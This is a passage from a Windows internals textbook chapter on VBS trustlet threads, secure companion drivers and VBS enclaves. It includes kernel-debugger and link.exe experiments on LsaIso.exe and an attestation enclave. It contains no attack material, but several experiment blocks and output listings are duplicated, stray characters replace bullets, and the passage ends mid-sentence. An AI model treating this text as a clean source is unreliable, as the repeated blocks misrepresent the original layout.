into it (see Stage 3D of Chapter 3 of Part 1 for more details). When doing so for secure processes, the
NT kernel invokes the INITIALIZE_PROCESS secure call to finish the setup in VTL 1. The Secure Kernel
copies the trustlet identity and trustlet attributes specified at process creation time into the new secure
process, creates the secure handle table, and maps the secure shared page into the address space.
The last step needed for the secure process is the creation of the secure thread. The initial thread
object is created as for normal processes in the NT kernel: When the NtCreateUserProcess calls
CHAPTER 9 Virtualization technologies
373
PspInsertThread, it has already allocated the thread kernel stack and inserted the necessary data to
start from the KiStartUserThread kernel function (see Stage 4 in Chapter 3 of Part 1 for further de-
tails). If the process is a trustlet, the NT kernel emits a CREATE_THREAD secure call for performing the
final secure thread creation. The Secure Kernel attaches to the new secure process’s address space
and allocates and initializes a secure thread data structure, a thread’s secure TEB, and kernel stack.
The Secure Kernel fills the thread’s kernel stack by inserting the thread-first initial kernel routine:
SkpUserThreadStart. It then initializes the machine-dependent hardware context for the secure thread,
which specifies the actual image start address and the address of the first user mode routine. Finally, it
associates the normal thread object with the new created secure one, inserts the thread into the secure
threads list, and marks the thread as runnable.
When the normal thread object is selected to run by the NT kernel scheduler, the execution still
starts in the KiStartUserThread function in VTL 0. The latter lowers the thread’s IRQL and calls the sys-
tem initial thread routine (PspUserThreadStartup). The execution proceeds as for normal threads, until
the NT kernel sets up the initial thunk context. Instead of doing that, it starts the Secure Kernel dispatch
loop by calling the VslpEnterIumSecureMode routine and specifying the RESUMETHREAD secure call.
The loop will exit only when the thread is terminated. The initial secure call is processed by the normal
call dispatcher loop in VTL 1, which identifies the “resume thread” entry reason to VTL 1, attaches to
the new process’s address space, and switches to the new secure thread stack. The Secure Kernel in
this case does not call the IumInvokeSecureService dispatcher function because it knows that the initial
thread function is on the stack, so it simply returns to the address located in the stack, which points to
the VTL 1 secure initial routine, SkpUserThreadStart.
SkpUserThreadStart, similarly to standard VTL 0 threads, sets up the initial thunk context to run the im-
age loader initialization routine (LdrInitializeThunk in Ntdll.dll), as well as the system-wide thread startup
stub (RtlUserThreadStart in Ntdll.dll). These steps are done by editing the context of the thread in place
and then issuing an exit from system service operation, which loads the specially crafted user context and
returns to user mode. The newborn secure thread initialization proceeds as for normal VTL 0 threads; the
LdrInitializeThunk routine initializes the loader and its needed data structures. Once the function returns,
NtContinue restores the new user context. Thread execution now truly starts: RtlUserThreadStart uses the
address of the actual image entry point and the start parameter and calls the application’s entry point.
Note A careful reader may have noticed that the Secure Kernel doesn’t do anything to pro-
tect the new trustlet’s binary image. This is because the shared memory that describes the
trustlet’s base binary image is still accessible to VTL 0 by design.
Let’s assume that a trustlet wants to write private data located in the image’s global data.
The PTEs that map the writable data section of the image global data are marked as copy-
on-write. So, an access fault will be generated by the processor. The fault belongs to a user
mode address range (remember that no NAR are used to track shared pages). The Secure
Kernel page fault handler transfers the execution to the NT kernel (through a normal call),
which will allocate a new page, copy the content of the old one in it, and protect it through
the SLAT (using a protected copy operation; see the section “The Secure Kernel memory
manager” earlier in this chapter for further details).
374
CHAPTER 9 Virtualization technologies
EXPERIMENT: Debugging a trustlet
Debugging a trustlet with a user mode debugger is possible only if the trustlet explicitly allows it
through its policy metadata (stored in the .tPolicy section). In this experiment, we try to debug a
trustlet through the kernel debugger. You need a kernel debugger attached to a test system (a lo-
cal kernel debugger works, too), which must have VBS enabled. HVCI is not strictly needed, though.
First, find the LsaIso.exe trustlet:
lkd> !process 0 0 lsaiso.exe
PROCESS ffff8904dfdaa080
SessionId: 0 Cid: 02e8 Peb: 8074164000 ParentCid: 0250
DirBase: 3e590002 ObjectTable: ffffb00d0f4dab00 HandleCount: 42.
Image: LsaIso.exe
Analyzing the process’s PEB reveals that some information is set to 0 or nonreadable:
lkd> .process /P ffff8904dfdaa080
lkd> !peb 8074164000
PEB at 0000008074164000
InheritedAddressSpace: No
ReadImageFileExecOptions: No
BeingDebugged: No
ImageBaseAddress:
00007ff708750000
NtGlobalFlag:
0
NtGlobalFlag2:
0
Ldr
0000000000000000
*** unable to read Ldr table at 0000000000000000
SubSystemData: 0000000000000000
ProcessHeap: 0000000000000000
ProcessParameters: 0000026b55a10000
CurrentDirectory: 'C:\Windows\system32\'
WindowTitle: '< Name not readable >'
ImageFile: '\??\C:\Windows\system32\lsaiso.exe'
CommandLine: '\??\C:\Windows\system32\lsaiso.exe'
DllPath:
'< Name not readable >'lkd
Reading from the process image base address may succeed, but it depends on whether the
LsaIso image mapped in the VTL 0 address space has been already accessed. This is usually the
case just for the first page (remember that the shared memory of the main image is accessible in
VTL 0). In our system, the first page is mapped and valid, whereas the third one is invalid:
lkd> db 0x7ff708750000 l20
00007ff7`08750000 4d 5a 90 00 03 00 00 00-04 00 00 00 ff 00 00 MZ..............
00007ff7`08750010 b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ........@.......
lkd> db (0x7ff708750000 + 2000) l20
00007ff7`08752000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
00007ff7`08752010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
lkd> !pte (0x7ff708750000 + 2000)
1: kd> !pte (0x7ff708750000 + 2000)
EXPERIMENT: Debugging a trustlet
Debugging a trustlet with a user mode debugger is possible only if the trustlet explicitly allows it
through its policy metadata (stored in the .tPolicy section). In this experiment, we try to debug a
trustlet through the kernel debugger. You need a kernel debugger attached to a test system (a lo-
cal kernel debugger works, too), which must have VBS enabled. HVCI is not strictly needed, though.
First, find the LsaIso.exe trustlet:
lkd> !process 0 0 lsaiso.exe
PROCESS ffff8904dfdaa080
SessionId: 0 Cid: 02e8 Peb: 8074164000 ParentCid: 0250
DirBase: 3e590002 ObjectTable: ffffb00d0f4dab00 HandleCount: 42.
Image: LsaIso.exe
Analyzing the process’s PEB reveals that some information is set to 0 or nonreadable:
lkd> .process /P ffff8904dfdaa080
lkd> !peb 8074164000
PEB at 0000008074164000
InheritedAddressSpace: No
ReadImageFileExecOptions: No
BeingDebugged: No
ImageBaseAddress:
00007ff708750000
NtGlobalFlag:
0
NtGlobalFlag2:
0
Ldr
0000000000000000
*** unable to read Ldr table at 0000000000000000
SubSystemData: 0000000000000000
ProcessHeap: 0000000000000000
ProcessParameters: 0000026b55a10000
CurrentDirectory: 'C:\Windows\system32\'
WindowTitle: '< Name not readable >'
ImageFile: '\??\C:\Windows\system32\lsaiso.exe'
CommandLine: '\??\C:\Windows\system32\lsaiso.exe'
DllPath:
'< Name not readable >'lkd
Reading from the process image base address may succeed, but it depends on whether the
LsaIso image mapped in the VTL 0 address space has been already accessed. This is usually the
case just for the first page (remember that the shared memory of the main image is accessible in
VTL 0). In our system, the first page is mapped and valid, whereas the third one is invalid:
lkd> db 0x7ff708750000 l20
00007ff7`08750000 4d 5a 90 00 03 00 00 00-04 00 00 00 ff 00 00 MZ..............
00007ff7`08750010 b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ........@.......
lkd> db (0x7ff708750000 + 2000) l20
00007ff7`08752000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
00007ff7`08752010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
lkd> !pte (0x7ff708750000 + 2000)
1: kd> !pte (0x7ff708750000 + 2000)
CHAPTER 9 Virtualization technologies
375
VA 00007ff708752000
PXE at FFFFD5EAF57AB7F8 PPE at FFFFD5EAF56FFEE0 PDE at FFFFD5EADFFDC218
contains 0A0000003E58D867 contains 0A0000003E58E867 contains 0A0000003E58F867
pfn 3e58d ---DA--UWEV pfn 3e58e ---DA--UWEV pfn 3e58f ---DA--UWEV
PTE at FFFFD5BFFB843A90
contains 00000000000000
not valid
Dumping the process’s threads reveals important information that confirms what we have
discussed in the previous sections:
!process ffff8904dfdaa080 2
PROCESS ffff8904dfdaa080
SessionId: 0 Cid: 02e8 Peb: 8074164000 ParentCid: 0250
DirBase: 3e590002 ObjectTable: ffffb00d0f4dab00 HandleCount: 42.
Image: LsaIso.exe
THREAD ffff8904dfdd9080 Cid 02e8.02f8 Teb: 0000008074165000
Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
ffff8904dfdc5ca0 NotificationEvent
THREAD ffff8904e12ac040 Cid 02e8.0b84 Teb: 0000008074167000
Win32Thread: 0000000000000000 WAIT: (WrQueue) UserMode Alertable
ffff8904dfdd7440 QueueObject
lkd> .thread /p ffff8904e12ac040
Implicit thread is now ffff8904`e12ac040
Implicit process is now ffff8904`dfdaa080
.cache forcedecodeuser done
lkd> k
*** Stack trace for last set context - .thread/.cxr resets it
# Child-SP
RetAddr
Call Site
00 ffffe009`1216c140 fffff801`27564e17 nt!KiSwapContext+0x76
01 ffffe009`1216c280 fffff801`27564989 nt!KiSwapThread+0x297
02 ffffe009`1216c340 fffff801`275681f9 nt!KiCommitThreadWait+0x549
03 ffffe009`1216c3e0 fffff801`27567369 nt!KeRemoveQueueEx+0xb59
04 ffffe009`1216c480 fffff801`27568e2a nt!IoRemoveIoCompletion+0x99
05 ffffe009`1216c5b0 fffff801`2764d504 nt!NtWaitForWorkViaWorkerFactory+0x99a
06 ffffe009`1216c7e0 fffff801`276db75f nt!VslpDispatchIumSyscall+0x34
07 ffffe009`1216c860 fffff801`27bab7e4 nt!VslpEnterIumSecureMode+0x12098b
08 ffffe009`1216c8d0 fffff801`276586cc nt!PspUserThreadStartup+0x178704
09 ffffe009`1216c9c0 fffff801`27658640 nt!KiStartUserThread+0x1c
0a ffffe009`1216cb00 00007fff`d06f7ab0 nt!KiStartUserThreadReturn
0b 00000080`7427fe18 00000000`00000000 ntdll!RtlUserThreadStart
The stack clearly shows that the execution begins in VTL 0 at the KiStartUserThread routine.
PspUserThreadStartup has invoked the secure call dispatch loop, which never ended and has
been interrupted by a wait operation. There is no way for the kernel debugger to show any
Secure Kernel’s data structures or trustlet’s private data.
VA 00007ff708752000
PXE at FFFFD5EAF57AB7F8 PPE at FFFFD5EAF56FFEE0 PDE at FFFFD5EADFFDC218
contains 0A0000003E58D867 contains 0A0000003E58E867 contains 0A0000003E58F867
pfn 3e58d ---DA--UWEV pfn 3e58e ---DA--UWEV pfn 3e58f ---DA--UWEV
PTE at FFFFD5BFFB843A90
contains 00000000000000
not valid
Dumping the process’s threads reveals important information that confirms what we have
discussed in the previous sections:
!process ffff8904dfdaa080 2
PROCESS ffff8904dfdaa080
SessionId: 0 Cid: 02e8 Peb: 8074164000 ParentCid: 0250
DirBase: 3e590002 ObjectTable: ffffb00d0f4dab00 HandleCount: 42.
Image: LsaIso.exe
THREAD ffff8904dfdd9080 Cid 02e8.02f8 Teb: 0000008074165000
Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
ffff8904dfdc5ca0 NotificationEvent
THREAD ffff8904e12ac040 Cid 02e8.0b84 Teb: 0000008074167000
Win32Thread: 0000000000000000 WAIT: (WrQueue) UserMode Alertable
ffff8904dfdd7440 QueueObject
lkd> .thread /p ffff8904e12ac040
Implicit thread is now ffff8904`e12ac040
Implicit process is now ffff8904`dfdaa080
.cache forcedecodeuser done
lkd> k
*** Stack trace for last set context - .thread/.cxr resets it
# Child-SP
RetAddr
Call Site
00 ffffe009`1216c140 fffff801`27564e17 nt!KiSwapContext+0x76
01 ffffe009`1216c280 fffff801`27564989 nt!KiSwapThread+0x297
02 ffffe009`1216c340 fffff801`275681f9 nt!KiCommitThreadWait+0x549
03 ffffe009`1216c3e0 fffff801`27567369 nt!KeRemoveQueueEx+0xb59
04 ffffe009`1216c480 fffff801`27568e2a nt!IoRemoveIoCompletion+0x99
05 ffffe009`1216c5b0 fffff801`2764d504 nt!NtWaitForWorkViaWorkerFactory+0x99a
06 ffffe009`1216c7e0 fffff801`276db75f nt!VslpDispatchIumSyscall+0x34
07 ffffe009`1216c860 fffff801`27bab7e4 nt!VslpEnterIumSecureMode+0x12098b
08 ffffe009`1216c8d0 fffff801`276586cc nt!PspUserThreadStartup+0x178704
09 ffffe009`1216c9c0 fffff801`27658640 nt!KiStartUserThread+0x1c
0a ffffe009`1216cb00 00007fff`d06f7ab0 nt!KiStartUserThreadReturn
0b 00000080`7427fe18 00000000`00000000 ntdll!RtlUserThreadStart
The stack clearly shows that the execution begins in VTL 0 at the KiStartUserThread routine.
KiStartUserThread routine.
KiStartUserThread
PspUserThreadStartup has invoked the secure call dispatch loop, which never ended and has
been interrupted by a wait operation. There is no way for the kernel debugger to show any
Secure Kernel’s data structures or trustlet’s private data.
376
CHAPTER 9 Virtualization technologies
Secure devices
VBS provides the ability for drivers to run part of their code in the secure environment. The Secure
Kernel itself can’t be extended to support kernel drivers; its attack surface would become too large.
Furthermore, Microsoft wouldn’t allow external companies to introduce possible bugs in a component
used primarily for security purposes.
The User-Mode Driver Framework (UMDF) solves the problem by introducing the concept of driver
companions, which can run both in user mode VTL 0 or VTL 1. In this case, they take the name of secure
companions. A secure companion takes the subset of the driver’s code that needs to run in a different
mode (in this case IUM) and loads it as an extension, or companion, of the main KMDF driver. Standard
WDM drivers are also supported, though. The main driver, which still runs in VTL 0 kernel mode, contin-
ues to manage the device’s PnP and power state, but it needs the ability to reach out to its companion
to perform tasks that must be performed in IUM.
Although the Secure Driver Framework (SDF) mentioned in Chapter 3 is deprecated, Figure 9-39
shows the architecture of the new UMDF secure companion model, which is still built on top of the
same UMDF core framework (Wudfx02000.dll) used in VTL 0 user mode. The latter leverages services
provided by the UMDF secure companion host (WUDFCompanionHost.exe) for loading and managing
the driver companion, which is distributed through a DLL. The UMDF secure companion host manag-
es the lifetime of the secure companion and encapsulates many UMDF functions that deal specifically
with the IUM environment.
Normal Mode (VTL 0)
Secure Mode (VTL 1)
Trustlet
UMDF Driver
Manager
Service
KMDF Core Fx
KMDF Driver
Driver Companion
WDF Binding Stub Lib
UMDF Core Fx
UMDF SecureHost
WDF
APIs
User Mode
Kernel Mode
ALPC
ALPC
ALPC
FIGURE 9-39 The WDF driver’s secure companion architecture.
CHAPTER 9 Virtualization technologies
377
A secure companion usually comes associated with the main driver that runs in the VTL 0 kernel. It
must be properly signed (including the IUM EKU in the signature, as for every trustlet) and must de-
clare its capabilities in its metadata section. A secure companion has the full ownership of its managed
device (this explains why the device is often called secure device). A secure device controller by a secure
companion supports the following features:
I
Secure DMA The driver can instruct the device to perform DMA transfer directly in protected
VTL 1 memory, which is not accessible to VTL 0. The secure companion can process the data
sent or received through the DMA interface and can then transfer part of the data to the VTL 0
driver through the standard KMDF communication interface (ALPC). The IumGetDmaEnabler
and IumDmaMapMemory secure system calls, exposed through Iumbase.dll, allow the secure
companion to map physical DMA memory ranges directly in VTL 1 user mode.
I
Memory mapped IO (MMIO) The secure companion can request the device to map its
accessible MMIO range in VTL 1 (user mode). It can then access the memory-mapped device’s
registers directly in IUM. MapSecureIo and the ProtectSecureIo APIs expose this feature.
I
Secure sections The companion can create (through the CreateSecureSection API) and map
secure sections, which represent memory that can be shared between trustlets and the main
driver running in VTL 0. Furthermore, the secure companion can specify a different type of SLAT
protection in case the memory is accessed through the secure device (via DMA or MMIO).
A secure companion can’t directly respond to device interrupts, which need to be mapped and
managed by the associated kernel mode driver in VTL 0. In the same way, the kernel mode driver still
needs to act as the high-level interface for the system and user mode applications by managing all the
received IOCTLs. The main driver communicates with its secure companion by sending WDF tasks using
the UMDF Task Queue object, which internally uses the ALPC facilities exposed by the WDF framework.
A typical KMDF driver registers its companion via INF directives. WDF automatically starts the driver’s
companion in the context of the driver’s call to WdfDeviceCreate—which, for plug and play drivers usually
happens in the AddDevice callback— by sending an ALPC message to the UMDF driver manager service,
which spawns a new WUDFCompanionHost.exe trustlet by calling the NtCreateUserProcess native API.
The UMDF secure companion host then loads the secure companion DLL in its address space. Another
ALPC message is sent from the UMDF driver manager to the WUDFCompanionHost, with the goal to ac-
tually start the secure companion. The DriverEntry routine of the companion performs the driver’s secure
initialization and creates the WDFDRIVER object through the classic WdfDriverCreate API.
The framework then calls the AddDevice callback routine of the companion in VTL 1, which usually
creates the companion’s device through the new WdfDeviceCompanionCreate UMDF API. The latter
transfers the execution to the Secure Kernel (through the IumCreateSecureDevice secure system call),
which creates the new secure device. From this point on, the secure companion has full ownership of its
managed device. Usually, the first thing that the companion does after the creation of the secure de-
vice is to create the task queue object (WDFTASKQUEUE) used to process any incoming tasks delivered
by its associated VTL 0 driver. The execution control returns to the kernel mode driver, which can now
send new tasks to its secure companion.
378
CHAPTER 9 Virtualization technologies
This model is also supported by WDM drivers. WDM drivers can use the KMDF’s miniport mode to
interact with a special filter driver, WdmCompanionFilter.sys, which is attached in a lower-level position
of the device’s stack. The Wdm Companion filter allows WDM drivers to use the task queue object for
sending tasks to the secure companion.
VBS-based enclaves
In Chapter 5 of Part 1, we discuss the Software Guard Extension (SGX), a hardware technology that allows
the creation of protected memory enclaves, which are secure zones in a process address space where
code and data are protected (encrypted) by the hardware from code running outside the enclave. The
technology, which was first introduced in the sixth generation Intel Core processors (Skylake), has suf-
fered from some problems that prevented its broad adoption. (Furthermore, AMD released another
technology called Secure Encrypted Virtualization, which is not compatible with SGX.)
To overcome these issues, Microsoft released VBS-based enclaves, which are secure enclaves whose
isolation guarantees are provided using the VSM infrastructure. Code and data inside of a VBS-based
enclave is visible only to the enclave itself (and the VSM Secure Kernel) and is inaccessible to the NT
kernel, VTL 0 processes, and secure trustlets running in the system.
A secure VBS-based enclave is created by establishing a single virtual address range within a normal
process. Code and data are then loaded into the enclave, after which the enclave is entered for the first
time by transferring control to its entry point via the Secure Kernel. The Secure Kernel first verifies that
all code and data are authentic and are authorized to run inside the enclave by using image signature
verification on the enclave image. If the signature checks pass, then the execution control is transferred
to the enclave entry point, which has access to all of the enclave’s code and data. By default, the system
only supports the execution of enclaves that are properly signed. This precludes the possibility that un-
signed malware can execute on a system outside the view of anti-malware software, which is incapable
of inspecting the contents of any enclave.
During execution, control can transfer back and forth between the enclave and its containing pro-
cess. Code executing inside of an enclave has access to all data within the virtual address range of the
enclave. Furthermore, it has read and write access of the containing unsecure process address space. All
memory within the enclave’s virtual address range will be inaccessible to the containing process. If mul-
tiple enclaves exist within a single host process, each enclave will be able to access only its own memory
and the memory that is accessible to the host process.
As for hardware enclaves, when code is running in an enclave, it can obtain a sealed enclave report,
which can be used by a third-party entity to validate that the code is running with the isolation guar-
antees of a VBS enclave, and which can further be used to validate the specific version of code running.
This report includes information about the host system, the enclave itself, and all DLLs that may have
been loaded into the enclave, as well as information indicating whether the enclave is executing with
debugging capabilities enabled.
CHAPTER 9 Virtualization technologies
379
A VBS-based enclave is distributed as a DLL, which has certain specific characteristics:
I
It is signed with an authenticode signature, and the leaf certificate includes a valid EKU that per-
mits the image to be run as an enclave. The root authority that has emitted the digital certificate
should be Microsoft, or a third-party signing authority covered by a certificate manifest that’s
countersigned by Microsoft. This implies that third-party companies could sign and run their own
enclaves. Valid digital signature EKUs are the IUM EKU (1.3.6.1.4.1.311.10.3.37) for internal Windows-
signed enclaves or the Enclave EKU (1.3.6.1.4.1.311.10.3.42) for all the third-party enclaves.
I
It includes an enclave configuration section (represented by an IMAGE_ENCLAVE_CONFIG data
structure), which describes information about the enclave and which is linked to its image’s load
configuration data directory.
I
It includes the correct Control Flow Guard (CFG) instrumentation.
The enclave’s configuration section is important because it includes important information needed
to properly run and seal the enclave: the unique family ID and image ID, which are specified by the
enclave’s author and identify the enclave binary, the secure version number and the enclave’s policy
information (like the expected virtual size, the maximum number of threads that can run, and the
debuggability of the enclave). Furthermore, the enclave’s configuration section includes the list of
images that may be imported by the enclave, included with their identity information. An enclave’s
imported module can be identified by a combination of the family ID and image ID, or by a combina-
tion of the generated unique ID, which is calculated starting from the hash of the binary, and author ID,
which is derived from the certificate used to sign the enclave. (This value expresses the identity of who
has constructed the enclave.) The imported module descriptor must also include the minimum secure
version number.
The Secure Kernel offers some basic system services to enclaves through the VBS enclave runtime
DLL, Vertdll.dll, which is mapped in the enclave address space. These services include: a limited subset
of the standard C runtime library, the ability to allocate or free secure memory within the address range
of the enclave, synchronization services, structured exception handling support, basic cryptographic
functions, and the ability to seal data.
EXPERIMENT: Dumping the enclae configuration
In this experiment, we use the Microsoft Incremental linker (link.exe) included in the Windows
SDK and WDK to dump software enclave configuration data. Both packages are downloadable
from the web. You can also use the EWDK, which contains all the necessary tools and does not
require any installation. It’s available at https://docs.microsoft.com/ en-us/windows-hardware/
drivers/download-the-wdk.
Open the Visual Studio Developer Command Prompt through the Cortana search box or
by executing the LaunchBuildEnv.cmd script file contained in the EWDK’s Iso image. We will
analyze the configuration data of the System Guard Routine Attestation enclave—which is
shown in Figure 9-40 and will be described later in this chapter—with the link.exe /dump
/loadconfig command:
EXPERIMENT: Dumping the enclae configuration
In this experiment, we use the Microsoft Incremental linker (link.exe) included in the Windows
SDK and WDK to dump software enclave configuration data. Both packages are downloadable
from the web. You can also use the EWDK, which contains all the necessary tools and does not
require any installation. It’s available at https://docs.microsoft.com/ en-us/windows-hardware/
drivers/download-the-wdk.
Open the Visual Studio Developer Command Prompt through the Cortana search box or
by executing the LaunchBuildEnv.cmd script file contained in the EWDK’s Iso image. We will
analyze the configuration data of the System Guard Routine Attestation enclave—which is
shown in Figure 9-40 and will be described later in this chapter—with the link.exe /dump
/loadconfig command:
380
CHAPTER 9 Virtualization technologies
The command’s output is large. So, in the example shown in the preceding figure, we have
redirected it to the SgrmEnclave_secure_loadconfig.txt file. If you open the new output file, you
see that the binary image contains a CFG table and includes a valid enclave configuration pointer,
which targets the following data:
Enclave Configuration
00000050 size
0000004C minimum required config size
00000000 policy flags
00000003 number of enclave import descriptors
0004FA04 RVA to enclave import descriptors
00000050 size of an enclave import descriptor
00000001 image version
00000001 security version
0000000010000000 enclave size
00000008 number of threads
00000001 enclave flags
family ID : B1 35 7C 2B 69 9F 47 F9 BB C9 4F 44 F2 54 DB 9D
image ID : 24 56 46 36 CD 4A D8 86 A2 F4 EC 25 A9 72 02
ucrtbase_enclave.dll
0 minimum security version
0 reserved
match type : image ID
family ID : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
image ID : F0 3C CD A7 E8 7B 46 EB AA E7 1F 13 D5 CD DE 5D
unique/author ID : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
bcrypt.dll
The command’s output is large. So, in the example shown in the preceding figure, we have
redirected it to the SgrmEnclave_secure_loadconfig.txt file. If you open the new output file, you
see that the binary image contains a CFG table and includes a valid enclave configuration pointer,
which targets the following data:
Enclave Configuration
00000050 size
0000004C minimum required config size
00000000 policy flags
00000003 number of enclave import descriptors
0004FA04 RVA to enclave import descriptors
00000050 size of an enclave import descriptor
00000001 image version
00000001 security version
0000000010000000 enclave size
00000008 number of threads
00000001 enclave flags
family ID : B1 35 7C 2B 69 9F 47 F9 BB C9 4F 44 F2 54 DB 9D
image ID : 24 56 46 36 CD 4A D8 86 A2 F4 EC 25 A9 72 02
ucrtbase_enclave.dll
0 minimum security version
0 reserved
match type : image ID
family ID : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
image ID : F0 3C CD A7 E8 7B 46 EB AA E7 1F 13 D5 CD DE 5D
unique/author ID : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
bcrypt.dll
CHAPTER 9 Virtualization technologies
381
0 minimum security version
0 reserved
match type : image ID
family ID : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
image ID : 20 27 BD 68 75 59 49 B7 BE 06 34 50 E2 16 D7 ED
unique/author ID : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
...
The configuration section contains the binary image’s enclave data (like the family ID, image
ID, and security version number) and the import descriptor array, which communicates to the
Secure Kernel from which library the main enclave’s binary can safely depend on. You can redo
the experiment with the Vertdll.dll library and with all the binaries imported from the System
Guard Routine Attestation enclave.
Enclave lifecycle
In Chapter 5 of Part 1, we discussed the lifecycle of a hardware enclave (SGX-based). The lifecycle of a
VBS-based enclave is similar; Microsoft has enhanced the already available enclave APIs to support the
new type of VBS-based enclaves.
Step 1: Creation An application creates a VBS-based enclave by specifying the ENCLAVE_TYPE_VBS
flag to the CreateEnclave API. The caller should specify an owner ID, which identifies the owner of
the enclave. The enclave creation code, in the same way as for hardware enclaves, ends up calling the
NtCreateEnclave in the kernel. The latter checks the parameters, copies the passed-in structures, and
attaches to the target process in case the enclave is to be created in a different process than the caller’s.
The MiCreateEnclave function allocates an enclave-type VAD describing the enclave virtual memory
range and selects a base virtual address if not specified by the caller. The kernel allocates the memory
manager’s VBS enclave data structure and the per-process enclave hash table, used for fast lookup of
the enclave starting by its number. If the enclave is the first created for the process, the system also cre-
ates an empty secure process (which acts as a container for the enclaves) in VTL 1 by using the CREATE
_PROCESS secure call (see the earlier section “Trustlets creation” for further details).
The CREATE_ENCLAVE secure call handler in VTL 1 performs the actual work of the enclave creation:
it allocates the secure enclave key data structure (SKMI_ENCLAVE), sets the reference to the container
secure process (which has just been created by the NT kernel), and creates the secure VAD describ-
ing the entire enclave virtual address space (the secure VAD contains similar information to its VTL 0
counterpart). This VAD is inserted in the containing process’s VAD tree (and not in the enclave itself).
An empty virtual address space for the enclave is created in the same way as for its containing process:
the page table root is filled by system entries only.
0 minimum security version
0 reserved
match type : image ID
family ID : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
image ID : 20 27 BD 68 75 59 49 B7 BE 06 34 50 E2 16 D7 ED
unique/author ID : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
...
The configuration section contains the binary image’s enclave data (like the family ID, image
ID, and security version number) and the import descriptor array, which communicates to the
Secure Kernel from which library the main enclave’s binary can safely depend on. You can redo
the experiment with the Vertdll.dll library and with all the binaries imported from the System
Guard Routine Attestation enclave.
382
CHAPTER 9 Virtualization technologies
Step 2: Loading modules into the enclave Differently from hardware-based enclaves, the parent
process can load only modules into the enclave but not arbitrary data. This will cause each page of the
image to be copied into the address space in VTL 1. Each image’s page in the VTL 1 enclave will be a
private copy. At least one module (which acts as the main enclave image) needs to be loaded into the
enclave; otherwise, the enclave can’t be initialized. After the VBS enclave has been created, an applica-
tion calls the LoadEnclaveImage API, specifying the enclave base address and the name of the module
that must be loaded in the enclave. The Windows Loader code (in Ntdll.dll) searches the specified DLL
name, opens and validates its binary file, and creates a section object that is mapped with read-only
access right in the calling process.
After the loader maps the section, it parses the image’s import address table with the goal to create
a list of the dependent modules (imported, delay loaded, and forwarded). For each found module, the
loader checks whether there is enough space in the enclave for mapping it and calculates the correct
image base address. As shown in Figure 9-40, which represents the System Guard Runtime Attestation
enclave, modules in the enclave are mapped using a top-down strategy. This means that the main
image is mapped at the highest possible virtual address, and all the dependent ones are mapped in
lower addresses one next to each other. At this stage, for each module, the Windows Loader calls the
NtLoadEnclaveData kernel API.
SgrmEnclave_Secure.dll
ucrtbase_enclave.dll
bcrypt.dll
vertdll.dll
bcryptPrimitives.dll
0x026D'18200000 (Top of the Enclave)
0x026D'08200000 (Enclave Base)
Private and
Free Space
0x026D'18194000
0x026D'1811C000
0x026D'180FC000
0x026D'180C4000
0x026D'18043000
Higher Addresses
FIGURE 9-40 The System Guard Runtime Attestation secure enclave (note the empty space at
the base of the enclave).
CHAPTER 9 Virtualization technologies
383
For loading the specified image in the VBS enclave, the kernel starts a complex process that al-
lows the shared pages of its section object to be copied in the private pages of the enclave in VTL 1.
The MiMapImageForEnclaveUse function gets the control area of the section object and validates it
through SKCI. If the validation fails, the process is interrupted, and an error is returned to the caller. (All
the enclave’s modules should be correctly signed as discussed previously.) Otherwise, the system at-
taches to the secure system process and maps the image’s section object in its address space in VTL 0.
The shared pages of the module at this time could be valid or invalid; see Chapter 5 of Part 1 for further
details. It then commits the virtual address space of the module in the containing process. This creates
private VTL 0 paging data structures for demand-zero PTEs, which will be later populated by the Secure
Kernel when the image is loaded in VTL 1.
The LOAD_ENCLAVE_MODULE secure call handler in VTL 1 obtains the SECURE_IMAGE of the new
module (created by SKCI) and verifies whether the image is suitable for use in a VBS-based enclave (by
verifying the digital signature characteristics). It then attaches to the secure system process in VTL 1
and maps the secure image at the same virtual address previously mapped by the NT kernel. This al-
lows the sharing of the prototype PTEs from VTL 0. The Secure Kernel then creates the secure VAD that
describes the module and inserts it into the VTL 1 address space of the enclave. It finally cycles between
each module’s section prototype PTE. For each nonpresent prototype PTE, it attaches to the secure
system process and uses the GET_PHYSICAL_PAGE normal call to invoke the NT page fault handler
(MmAccessFault), which brings in memory the shared page. The Secure Kernel performs a similar
process for the private enclave pages, which have been previously committed by the NT kernel in VTL 0
by demand-zero PTEs. The NT page fault handler in this case allocates zeroed pages. The Secure Kernel
copies the content of each shared physical page into each new private page and applies the needed
private relocations if needed.
The loading of the module in the VBS-based enclave is complete. The Secure Kernel applies the SLAT
protection to the private enclave pages (the NT kernel has no access to the image’s code and data in
the enclave), unmaps the shared section from the secure system process, and yields the execution to
the NT kernel. The Loader can now proceed with the next module.
Step 3: Enclave initialization After all the modules have been loaded into the enclave, an applica-
tion initializes the enclave using the InitializeEnclave API, and specifies the maximum number of threads
supported by the enclave (which will be bound to threads able to perform enclave calls in the contain-
ing process). The Secure Kernel’s INITIALIZE_ENCLAVE secure call’s handler verifies that the policies
specified during enclave creation are compatible with the policies expressed in the configuration infor-
mation of the primary image, verifies that the enclave’s platform library is loaded (Vertdll.dll), calculates
the final 256-bit hash of the enclave (used for generating the enclave sealed report), and creates all the
secure enclave threads. When the execution control is returned to the Windows Loader code in VTL 0,
